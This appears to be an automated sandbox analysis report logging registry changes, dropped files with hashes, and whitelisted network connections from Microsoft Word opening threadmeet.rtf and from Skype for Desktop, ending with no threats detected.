HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1321992233
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1321992234
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1321992233
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1321992234
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992254
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992255
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1321992235
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1321992236
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1321992235
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1321992236
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992256
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992257
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992258
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992259
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992260
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992261
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Toolbars\Settings
Microsoft Word
0101000000000000000006000000
2700
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\127E03
2700
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery
2700
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
C00010033001000034010000040000001E0000001E0000001E0000001E0000001E0000001E000000220000001E0000001E0000001E000000060000000600000006000000060000000600000000000000060000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000C00000002000000020000000200000002000000000000000000000000000000480000000600000006000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000000DC000000E25024A1100A00633090060007000A002D001600000016000000C0030000F501000004060300000000000000000000000000040087010C000600C80009000180FFFF000006000000040000000C0100000502000000000000A004020000001200000000603090000064000000000000FF0000FF000000000000FF01000000010000005C08E0100000000000010000E40400001D000100000000000000020050000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D000000000000000000000000D4944600D49446010000002F91010000080A000600000003333296040000000A050C0C0302040600000300000101010606060000000000000000000000000000000000000063631900000001000000000000000000000000000000030000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000002100190000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006301190000008C0A00000000E01000004B0000004B0000002000640000006301190000008C0A00000000B01300004B0000004B000000640000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000009002000002000001010101010101000101010101010001010100010001000101010101010101000100020003010301030103000301020003010301030103010000230101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101020101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010301010101010101010101010101FFFFCFFFFFFF00008602FFFF00008602FFFF00000C00FFFF00000100FFFF00000100FFFF0000010061000000610064006D0069006E000000000000000000000087FFFF0300003E00020200000600090034000000000090009000000000000F000000FFFFFF000000000000001400140000000000000002637800C80000000000140000000000900090008000FFFF00000800FFFF00000800FFFF0B00040001002000018014000B0043006F007500720069006500720020004E0065007700018014000B0043006F007500720069006500720020004E0065007700018014000B0043006F007500720069006500720020004E00650077000180140001002000018014000B0043006F007500720069006500720020004E00650077000180140009004D005300200047006F0074006800690063000180150007004D0069006E0067004C0069005500018018000600530069006D00530075006E0001801500050044006F00740075006D00018014000100200001801C0000000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
BackgroundOpen
0
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992338
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992339
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
93
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
93
3640
Skype.exe
write
HKEY_CLASSES_ROOT\skype
URL Protocol
3640
Skype.exe
write
HKEY_CLASSES_ROOT\skype
URL:skype
3640
Skype.exe
write
HKEY_CLASSES_ROOT\skype\shell\open\command
"C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" -- "%1"
3640
Skype.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
1692
reg.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Skype for Desktop
C:\Program Files\Microsoft\Skype for Desktop\Skype.exe

Files activity

Executable files
0
Suspicious files
4
Text files
15
Unknown types
4

Dropped files

PID
Process
Filename
Type
2752
Skype.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-0-201853290.blog
binary
MD5: 56050b6bd87a9787634d9e49c2bd503e
SHA256: 231afe246d9fba0c259f3212b5d413829875dbab56132578791b7c25dc63f4f7
3640
Skype.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json
text
MD5: fcb20e92c05828acadd1ac43e9979e30
SHA256: 6c6a926cd18f9952af42cbce920ba705ab64d65ad88ca6d039bc20c7f6c7530e
3640
Skype.exe
C:\Users\admin\AppData\Local\Temp\4b1e05fc-3a30-4d7a-9d80-cc4a7dfb80d1.tmp.ico
image
MD5: e946d0929470b5e6006fe9bce06171d2
SHA256: 5d9c38bd132dfae94c31b1acffe170c6b8c8988c53557b89caaf8870df34c8c9
3640
Skype.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old
text
MD5: 0d8db3d43bcb9f490169188e803314de
SHA256: 1a5cbd55803117484fa35a69d5535f9b6d9fb7d3272a585084c9f4b2fa3c4ac3
3640
Skype.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old~RF12d1b0.TMP
text
MD5: 0d8db3d43bcb9f490169188e803314de
SHA256: 1a5cbd55803117484fa35a69d5535f9b6d9fb7d3272a585084c9f4b2fa3c4ac3
2132
Skype.exe
C:\Users\admin\AppData\Local\Temp\skype-preview Crashes\operation_log.txt
text
MD5: 5f0794c37f90c10ad9795bfcb61d1529
SHA256: 45a921510087244ea6f2c6951e33dccb30b9e32c7cf82ad8b4c49a4dd85c977d
3640
Skype.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000020.ldb
binary
MD5: 293e0f9b607cd2b0cdd018cf9d0cda80
SHA256: c5d2e32e6b4104d72815c2dd3ff491dc500a1bbd78fc2e2a44c211d340de6d9b
3640
Skype.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old
text
MD5: 7f39b22308b34b4138a09991ec4d41c5
SHA256: 31c4d714afbfab8d23ae08f061f6a5f1e46a26b0ab20795eac7d2134a55cceb6
3640
Skype.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old~RF12c1c2.TMP
text
MD5: 7f39b22308b34b4138a09991ec4d41c5
SHA256: 31c4d714afbfab8d23ae08f061f6a5f1e46a26b0ab20795eac7d2134a55cceb6
3640
Skype.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json
text
MD5: 4f349808dfe98c6d37e9834416d9ff22
SHA256: e7c439f3219511948aef278f12fd5f2f751fd253846ba1656bda0afca08e2468
2116
Skype.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-1-201853290.blog
binary
MD5: 56050b6bd87a9787634d9e49c2bd503e
SHA256: 231afe246d9fba0c259f3212b5d413829875dbab56132578791b7c25dc63f4f7
3640
Skype.exe
C:\Users\admin\AppData\Local\Temp\8f472ace-f89c-4c34-a46e-f7db989a0fc1.tmp.ico
image
MD5: 75a3d7765f2f4f8712775b10e1d18003
SHA256: 28854f198091126b6e3a57fe312a3b77c1074cd0b111aed6f7604a2467f52166
3640
Skype.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b916037c1e115fe0.customDestinations-ms
binary
MD5: d31368de7ca649d55c099503c8ab992e
SHA256: 7498692662eedc761c241d17aaaa0317113505eb51b033c58e21f1f5a168bf37
3640
Skype.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y1HVBW254LKJYWP8CEZS.temp
––
MD5:  ––
SHA256:  ––
2700
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2AE3667E-88B0-4CE0-8174-A7B992B72CB7}.tmp
––
MD5:  ––
SHA256:  ––
2700
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EDF130F8-F6F5-4652-9D35-D0AE208ABC1E}.tmp
––
MD5:  ––
SHA256:  ––
2700
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 695a5032ba8ee5681fe8455df60875e5
SHA256: 0f756df486cb8e81dda087fbdf008f69641fb0d7bf027e5057f5210f8af3d8ed
2700
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\threadmeet.rtf.LNK
lnk
MD5: db5f3a61cd5455598b9168547708eab6
SHA256: 1be6e02b5004953da0d0390a0a4386f12e888865b5f471738c3df54bea43d20a
2700
WINWORD.EXE
C:\Users\admin\Desktop\~$readmeet.rtf
pgc
MD5: c4a35245a4738f2c3488bd10c2865f26
SHA256: dcdf07c9331abda243dc9f559a621c800306aa17abd032811b039de834c16797
2700
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5: 883bf012f8a61702601f881039892b3f
SHA256: 33869c05b961b0569608249b2c6730a115f84db00ee4a0d183337c097afac11e
2700
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVR7855.tmp.cvr
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
6
DNS requests
6
Threats
0

HTTP requests

No HTTP requests.

Connections

PID Process IP ASN CN Reputation
3640 Skype.exe 13.90.95.57:443 Microsoft Corporation US whitelisted
3640 Skype.exe 23.101.158.111:443 Microsoft Corporation US whitelisted
3640 Skype.exe 52.114.32.7:443 Microsoft Corporation JP whitelisted
3640 Skype.exe 2.18.233.81:443 Akamai International B.V. –– whitelisted
3640 Skype.exe 216.58.207.74:443 Google Inc. US whitelisted
3640 Skype.exe 40.79.33.178:443 Microsoft Corporation US whitelisted

DNS requests

Domain IP Reputation
get.skype.com 13.90.95.57
whitelisted
a.config.skype.com 23.101.158.111
whitelisted
pipe.skype.com 52.114.32.7
whitelisted
download.skype.com 2.18.233.81
whitelisted
www.googleapis.com 216.58.207.74
172.217.16.170
216.58.208.42
172.217.16.138
172.217.22.42
172.217.22.74
172.217.22.106
172.217.16.202
172.217.18.106
172.217.23.170
172.217.21.202
216.58.205.234
172.217.21.234
172.217.22.10
172.217.18.10
172.217.18.170
whitelisted
avatar.skype.com 40.79.33.178
unknown

Threats

No threats detected.

Debug output strings

Process Message
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752
Skype.exe [2140:1412:0612/001606.158:VERBOSE1:crash_service.cc(341)] client end. pid = 2752